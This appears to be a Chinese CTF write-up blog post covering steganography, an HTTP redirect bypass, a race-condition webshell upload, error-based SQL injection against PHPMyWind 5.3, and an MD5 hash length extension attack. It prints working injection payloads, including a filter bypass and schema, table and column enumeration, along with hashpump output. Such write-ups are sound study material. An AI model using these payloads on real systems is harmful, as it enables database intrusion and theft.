<h2 id="学姐真美"><a href="#学姐真美" class="headerlink" title="学姐真美"></a>学姐真美</h2><p>PS：这也是入门赛的一道题，但是感觉涨了姿势，所以想记录下</p>
<blockquote>
<p>orz,这个学姐真的美。。。。。<br>打开链接<a href="http://download.bxsteam.xyz/dream.jpg" target="_blank" rel="noopener">学姐真美</a><br>首先想到的就是隐写术，拖进winhex<br>看到文件前面这一大串00000000000000000000000很让人起疑心啊</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfXtK.png" alt="1"></p>
<p>直接搜索jpg结束符“FF D9”</p>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfjfO.png" alt="2"></p>
<blockquote>
<p>结束符后边竟然还有东西，直接复制粘贴到HxD,随便找一张png图片对照修改文件头，保存打开</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pShpXd.png" alt="3"></p>
<blockquote>
<p>这里发现七牛云图不能上传带二维码的东西。。。。。</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfz1e.png" alt="4"></p>
<p><span style="color: red;">WTF?/????</span></p>
<blockquote>
<p>发生了什么。。。一定是文件头没改对全部，接下来就是各种搜索了</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pShmcQ.png" alt="5"></p>
<blockquote>
<p>就像图片显示的一样，找到长宽位置，发现 的确是不对称啊，修改之后再打开保存，嗯。。。。。可以了</p>
</blockquote>
<h2 id="白驹过隙"><a href="#白驹过隙" class="headerlink" title="白驹过隙"></a>白驹过隙</h2><blockquote>
<p>23333333333333333,虽然这道题只有十分，但是我一直没做出来。。。。。<br>打开链接<a href="http://202.119.201.199/challenge/basic/http/defauIt.php" target="_blank" rel="noopener">白驹过隙</a>，看到you have missed the flag<br>很容易想到的就是抓包。如果你仔细看的话应该会发现，<span style="color: red;">链接里面的defauIt是i的大写</span>。。。。（我是没看出来）<br>302回调，在浏览器直接修改还是会跳转的，所以掏出神器burp,抓包，修改链接，提交<br>响应里就是flag</p>
</blockquote>
<p>PS:这是我遇到的。。。。。感觉。。。。最。。。。。。让我。。。。额。。。。后面的词可以联想。。。。</p>
<h2 id="logic"><a href="#logic" class="headerlink" title="logic"></a>logic</h2><blockquote>
<p>这道题非常非常非常仔细看F12源码,就OK了<br>一个备份泄露,一个算是偏向社工的吧,仔细点</p>
</blockquote>
<h2 id="上传三"><a href="#上传三" class="headerlink" title="上传三"></a>上传三</h2><blockquote>
<p>条件竞争,上传马的同时访问马<br>靠运气可以迅速得flag</p>
</blockquote>
<h2 id="phpmywind"><a href="#phpmywind" class="headerlink" title="phpmywind"></a>phpmywind</h2><blockquote>
<p>已经给了版本是5.3,打开谷歌搜索相关漏洞<br>有个留言板储存型xss,和前台注入<br>题目中明示删除了后台,要直接从数据库中提取,这个版本xss需要后台触发<br>所以基本确定注入</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pS2hfe.png" alt="函数"></p>
<blockquote>
<p>下面列取注入步緅(也是第一次很认真的做注入题目)</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSWGV0.png" alt="phpmywind"></p>
<blockquote>
<p>首先注入,但是查询没有回显,很烦，最后是插入到可直接访问的表段解决</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSRmc9.png" alt="漏洞函数"></p>
<blockquote>
<p>有个东西叫做报错盲注,全程在用,具体解释谷歌</p>
</blockquote>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select count(*),concat(你要查询的语句,floor(rand(0)<span class="number">*2</span>))x <span class="keyword">from</span> information_schema.tables<span class="built_in"> group </span>by x</span><br></pre></td></tr></table></figure>
<p>一开始我在本地搭建了一下,源码子查询存在过滤,用char(@<code>%27</code>)绕过(别问我怎么知道的,小红跟我说的)</p>
<p><img src="https://s1.ax1x.com/2018/01/01/pS2fYD.md.png" alt="过滤"></p>
<p>(改变以下代码中N的值,一个个爆,具体解释网上都有,这一串算种套路了)</p>
<h3 id="获取基本信息"><a href="#获取基本信息" class="headerlink" title="获取基本信息"></a>获取基本信息</h3><blockquote>
<p>将你要的函数放在查询语句处</p>
</blockquote>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">system_user() 系统用户名</span><br><span class="line">user() 用户名</span><br><span class="line">current_user 当前用户名</span><br><span class="line">session_user()连接数据库的用户名</span><br><span class="line">database() 数据库名</span><br><span class="line">version() MYSQL数据库版本</span><br><span class="line">load_file() MYSQL读取本地文件的函数</span><br><span class="line">@@datadir 读取数据库路径</span><br><span class="line">@@basedir MYSQL 安装路径</span><br><span class="line">@@version_compile_os 操作系统</span><br></pre></td></tr></table></figure>
<h3 id="也可以这样一个个爆库"><a href="#也可以这样一个个爆库" class="headerlink" title="也可以这样一个个爆库"></a>也可以这样一个个爆库</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">sql</span>=select count(*),concat(char(@`%27`),(select SCHEMA_NAME <span class="keyword">from</span> information_schema.SCHEMATA limit n,1), 0x23,floor(rand(0)<span class="number">*2</span>),char(@`%27`))x <span class="keyword">from</span> information_schema.tables<span class="built_in"> group </span>by x</span><br></pre></td></tr></table></figure>
<h3 id="爆表"><a href="#爆表" class="headerlink" title="爆表"></a>爆表</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sql=<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="built_in">char</span>(@<span class="string">`%27`</span>),(<span class="keyword">select</span> TABLE_NAME <span class="keyword">from</span> information_schema.TABLES <span class="keyword">where</span> TABLE_SCHEMA =<span class="number">16</span>进制库名 <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>), <span class="number">0x23</span>,<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>),<span class="built_in">char</span>(@<span class="string">`%27`</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x</span><br></pre></td></tr></table></figure>
<h3 id="爆字段"><a href="#爆字段" class="headerlink" title="爆字段"></a>爆字段</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sql=<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="built_in">char</span>(@<span class="string">`%27`</span>),(<span class="keyword">select</span> column_name <span class="keyword">from</span> (<span class="keyword">select</span> * <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=<span class="number">16</span>进制表名 <span class="keyword">and</span> table_schema=<span class="number">16</span>进制库名 <span class="keyword">order</span> <span class="keyword">by</span> <span class="number">1</span> <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>)t <span class="keyword">limit</span> <span class="number">1</span>), <span class="number">0x23</span>,<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>),<span class="built_in">char</span>(@<span class="string">`%27`</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x</span><br></pre></td></tr></table></figure>
<h3 id="显示flag"><a href="#显示flag" class="headerlink" title="显示flag"></a>显示flag</h3><blockquote>
<p>由于没有select回显,可以想法让他select之后插入到其他可以显示的表里<br>我插入到了pmw_info,具体表可以在源码看,方便点</p>
</blockquote>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sql=replace into pmw_info (`id`,`classid`,`mainid`,`picurl`,`content`,`posttime`) VALUES (<span class="number">3</span>,<span class="number">3</span>,<span class="number">1</span>,char(@`%<span class="number">27</span>`),(select flag <span class="keyword">from</span> phpmyflag.flag ),char(@`%<span class="number">27</span>`))</span><br></pre></td></tr></table></figure>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfndx.png" alt="效果"></p>
<h2 id="md5"><a href="#md5" class="headerlink" title="md5"></a>md5</h2><blockquote>
<p>(这道题，，，就是密码题,手动解吧,等过段时间–2017.10.03)<br>模仿着写了一个类似源码的东西,不过还是提交不对<br>让我怀疑是不是题目挂了,不过也可能是我哪里没注意到<br>这里的16进制不知道后台源码处理了没有,我感觉我没读懂题目啊。。。。。</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	$key = <span class="string">'safwefdsfsacxwwl'</span>; <span class="comment">//16位salt</span></span><br><span class="line">	$b=$_GET[<span class="string">'a'</span>];</span><br><span class="line">	$k = md5($key.$b);</span><br><span class="line">	<span class="keyword">echo</span> $key.$b.<span class="string">'&lt;br/&gt;'</span>;</span><br><span class="line">	<span class="keyword">echo</span> $k.<span class="string">'&lt;br/&gt;'</span>;</span><br><span class="line">	<span class="keyword">if</span>($k ===$_GET[<span class="string">'c'</span>])&#123;</span><br><span class="line">		<span class="keyword">print</span> <span class="string">'success&lt;/br&gt;'</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="keyword">print</span> <span class="string">'fail&lt;/br&gt;'</span>;</span><br><span class="line">	&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://s1.ax1x.com/2018/01/01/pSWDq1.png" alt="生成"></p>
<blockquote>
<p>以前写的一篇小结,<a href="https://bayi87.github.io/2017/05/12/%E5%93%88%E5%B8%8C%E9%95%BF%E5%BA%A6%E6%89%A9%E5%B1%95%E6%94%BB%E5%87%BB/" target="_blank" rel="noopener">哈希拓展攻击</a><br>网上也是大把的资源,可以自己搜</p>
</blockquote>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~# hashpump</span><br><span class="line">Input Signature: 4dbe35eaea655b0a2b0d06391175b8a3</span><br><span class="line">Input Data: 637972</span><br><span class="line">Input Key Length: 16</span><br><span class="line">Input Data to Add: 70</span><br><span class="line">b186167e53b172a5d5f73d664b89e80c</span><br><span class="line">637972\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\x00\x00\x00\x00\x00\x00\x0070</span><br></pre></td></tr></table></figure>
<p><img src="https://s1.ax1x.com/2018/01/01/pSW6IK.png" alt="利用"></p>

      
    </div>

    
      
      



      
      
    

    
      <footer class="post-footer">
        
          <div class="post-tags">
            
              <a href="/tags/ctf/">ctf</a>
            
              <a href="/tags/writeup/">writeup</a>
            
              <a href="/tags/密码/">密码</a>
            
              <a href="/tags/隐写/">隐写</a>
            
          </div>
        
        
        
  <nav class="post-nav">
    
      <a class="prev" href="/2017/03/09/关于html登录界面/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">关于html登录界面的简单学习</span>
        <span class="prev-text nav-mobile">上一篇</span>
      </a>
    
    
      <a class="next" href="/2017/03/01/记录/">
        <span class="next-text nav-default">记录</span>
        <span class="prev-text nav-mobile">下一篇</span>
        <i class="iconfont icon-right"></i>
      </a>
    
  </nav>

      </footer>
    

  </article>


          </div>
          
  <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div> 
    </div>
  </div>


        </div>
      </main>

      <footer id="footer" class="footer">

  <div class="social-links">
    
      
        
          <a href="https://github.com/bay1" class="iconfont icon-github" title="github"></a>
        
      
    
      
        
          <a href="http://weibo.com/3190704711/profile?topnav=1&wvr=6&is_all=1" class="iconfont icon-weibo" title="weibo"></a>
        
      
    
      
    
      
    
      
    
    
    
  </div>


<div class="copyright">
  <span class="copyright-year">
    
    &copy; 
     
      2016 - 
    
    2018
    <span class="author">bay1</span>
  </span>
</div>
      </footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div>

    
  
  <script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'https://bay1.top/2017/03/02/天朝挖煤ctf/';
        this.page.identifier = '2017/03/02/天朝挖煤ctf/';
        this.page.title = '天朝挖煤CTF';
    };
    (function() {
    var d = document, s = d.createElement('script');

    s.src = '//https-blog-flywinky-top-1.disqus.com/embed.js';

    s.setAttribute('data-timestamp', +new Date());
    (d.head || d.body).appendChild(s);
    })();  
  </script>



    
  





  
    <script type="text/javascript" src="/lib/jquery/jquery-3.1.1.min.js"></script>
  

  
    <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  

  
    <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  


    <script type="text/javascript" src="/js/src/even.js?v=2.6.0"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=2.6.0"></script>
<script src="/js/prettify.js"></script>
<script type="text/javascript">
$(document).ready(function(){
 $('pre').addClass('prettyprint');
   prettyPrint();
 })
</script>
  </body>
</html>
